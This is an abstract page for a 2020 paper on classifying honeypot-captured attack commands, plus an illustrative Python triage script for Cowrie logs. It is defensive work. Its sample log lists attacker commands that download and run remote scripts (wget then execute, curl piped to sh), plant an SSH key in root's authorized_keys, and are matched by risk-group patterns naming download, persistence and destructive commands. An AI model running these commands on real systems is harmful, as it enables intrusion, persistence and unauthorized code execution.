Research area: Infrastructure
Venue: MSIE '20: Proceedings of the 2020 2nd International Conference on Management Science and Industrial Engineering
This research presents a method for discovering malware captured by a honeypot. The focus is network intrusion against Unix and Linux systems. A process flow is introduced for collecting, analyzing, and classifying cyberattack patterns. Log management and analytics are performed with the Elastic Stack (formerly known as ELK). The honeypot's log files (cowrie.log, the log of the Cowrie honeypot) are collected periodically, then filtered, formatted, and inspected by shell scripts. To detect suspicious commands, a rule set is defined that sorts commands into risk groups: commands that can expose the organization's assets to harm. When a command matches a risk group, the system analyzes its attack pattern by querying the VirusTotal database. VirusTotal is a free online service that scans suspicious files and URLs with many antivirus engines; its API returns the reports of all engines that have previously scanned the submitted file or URL. In the experiment reported here, 86% of the URLs and files that belonged to the command risk groups were judged to be threats. The analytic results can feed the organization's security policies and the subsequent development of proactive security operations.
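The pipeline the abstract describes (collect cowrie.log, split and match commands against risk groups, look up any URL or file in VirusTotal, apply a threat rule) can be sketched end to end. The block below is an added example, not the paper's code or Cowrie's: the log lines are constructed to approximate Cowrie's text log format, the risk groups are hypothetical stand-ins for the paper's unpublished rule set, and the VirusTotal part only builds the v3 API request and scores a response object, so nothing leaves the machine.

```python
"""Offline triage of Cowrie honeypot command logs against command risk groups.

Added example (not code from the paper or from Cowrie). Constructed cowrie.log-style
lines are parsed, each shell command is split and matched against hypothetical risk
groups, URLs in risky commands become VirusTotal v3 lookup requests (built, not sent),
and a VirusTotal last_analysis_stats object is turned into a threat verdict.
"""
import base64
import re

# Constructed sample lines approximating Cowrie's text log format; not real captures.
SAMPLE_LOG = """\
2020-01-15T10:22:01.123456Z [SSHChannel session (0) on SSHService b'ssh-connection' on HoneyPotSSHTransport,1,203.0.113.5] CMD: uname -a
2020-01-15T10:22:03.004567Z [SSHChannel session (0) on SSHService b'ssh-connection' on HoneyPotSSHTransport,1,203.0.113.5] CMD: cd /tmp; wget http://203.0.113.99/bins/x86.sh -O x.sh; chmod +x x.sh; ./x.sh
2020-01-15T10:22:09.000000Z [SSHChannel session (0) on SSHService b'ssh-connection' on HoneyPotSSHTransport,1,203.0.113.5] CMD: echo "ssh-rsa AAAAB3fakekey attacker" >> /root/.ssh/authorized_keys
2020-01-15T10:23:44.000000Z [SSHChannel session (0) on SSHService b'ssh-connection' on HoneyPotSSHTransport,2,198.51.100.7] CMD: ls -la
2020-01-15T10:23:50.000000Z [SSHChannel session (0) on SSHService b'ssh-connection' on HoneyPotSSHTransport,2,198.51.100.7] CMD: curl -s https://198.51.100.200/dl/miner | sh
"""

# Hypothetical command risk groups (the paper's rule set is not on this page).
# Each regex is searched against one simple command after the command line is split.
RISK_GROUPS = {
    "download": re.compile(r"^(wget|curl|tftp|ftpget|scp)\b"),
    "execute":  re.compile(r"^(chmod\s+\+?x|sh|bash|\./\S+|perl|python[23]?)\b"),
    "persist":  re.compile(r"(authorized_keys|crontab|/etc/rc\.local|systemctl\s+enable)"),
    "destroy":  re.compile(r"^rm\s+(-\w*r\w*|--recursive)\b|^dd\s+if="),
}

# Timestamp, transport id and source IP from the bracketed prefix, then the command.
LOG_RE = re.compile(r"^(?P<ts>\S+) \[.*?,(?P<session>\d+),(?P<src_ip>[\d.]+)\] CMD: (?P<cmd>.*)$")
URL_RE = re.compile(r"(?:https?|ftp|tftp)://[^\s;|&'\"]+")
SPLIT_RE = re.compile(r"\s*(?:;|&&|\|\||\|)\s*")   # ;  &&  ||  |  separate simple commands


def split_commands(cmdline):
    """Break a compound shell line into simple commands (quotes are not honoured)."""
    return [c.strip() for c in SPLIT_RE.split(cmdline) if c.strip()]


def classify(command):
    """Return the set of risk-group names whose rule matches this simple command."""
    return {name for name, rx in RISK_GROUPS.items() if rx.search(command)}


def triage(log_text):
    """Parse cowrie.log-style text and return one finding per risky simple command."""
    findings = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue                      # not a CMD line (login, disconnect, ...)
        for cmd in split_commands(m["cmd"]):
            groups = classify(cmd)
            if not groups:
                continue
            findings.append({
                "timestamp": m["ts"], "session": m["session"], "src_ip": m["src_ip"],
                "command": cmd, "groups": sorted(groups), "urls": URL_RE.findall(cmd),
            })
    return findings


def vt_url_id(url):
    """VirusTotal v3 URL identifier: unpadded URL-safe base64 of the URL."""
    return base64.urlsafe_b64encode(url.encode()).decode().rstrip("=")


def vt_request(indicator, api_key):
    """Build (do not send) the VirusTotal v3 GET for a URL or a SHA-256 file hash."""
    if re.fullmatch(r"[0-9a-fA-F]{64}", indicator):
        path = "/api/v3/files/" + indicator.lower()
    else:
        path = "/api/v3/urls/" + vt_url_id(indicator)
    return {"method": "GET", "url": "https://www.virustotal.com" + path,
            "headers": {"x-apikey": api_key}}


def verdict(last_analysis_stats, min_flagged=1):
    """Threat rule over a VirusTotal v3 last_analysis_stats object.

    The threshold is an assumption; the paper does not state how it counted threats.
    """
    stats = last_analysis_stats
    flagged = stats.get("malicious", 0) + stats.get("suspicious", 0)
    engines = sum(stats.get(k, 0) for k in ("malicious", "suspicious", "harmless", "undetected"))
    return {"threat": flagged >= min_flagged, "flagged": flagged, "engines": engines}


if __name__ == "__main__":
    for f in triage(SAMPLE_LOG):
        print(f["src_ip"], f["groups"], f["command"])
        for u in f["urls"]:
            print("   VT lookup:", vt_request(u, "YOUR_API_KEY")["url"])
```

Two caveats a deployment needs: VirusTotal only returns a report for a URL or hash someone has already submitted, so a miss on GET means submitting the sample (a POST to the same API), and every lookup discloses the indicator to a third party, which matters if the honeypot sits in a range attackers can tie to the organization. The naive split on `|` and `;` also ignores quoting, so a URL that contains those characters will be cut short.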
| Publication year | 2020 |
|---|---|
| Citations | 2 |
| Country of publication | Thailand |
| Site | ACM |